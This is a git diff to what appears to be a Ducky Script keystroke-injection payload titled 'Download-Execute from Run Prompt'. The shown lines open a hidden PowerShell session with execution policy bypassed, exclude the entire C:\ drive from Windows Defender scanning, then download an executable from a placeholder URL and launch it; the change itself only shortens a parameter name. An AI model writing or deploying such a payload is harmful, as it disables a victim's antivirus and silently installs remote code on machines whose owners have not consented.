diff --git a/Tools/Download-Execute from Run Prompt.txt b/Tools/Download-Execute from Run Prompt.txt index 2081f86..30b7398 100644 --- a/Tools/Download-Execute from Run Prompt.txt +++ b/Tools/Download-Execute from Run Prompt.txt @@ -15,7 +15,7 @@ DELAY 750 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\;Start-Sleep 1; REM replace FILE_URL_HERE below. -STRING iwr -Uri FILE_URL_HERE -OutFile upl.exe;Start-Sleep 1;Start upl.exe;exit +STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit CTRL-SHIFT ENTER DELAY 1500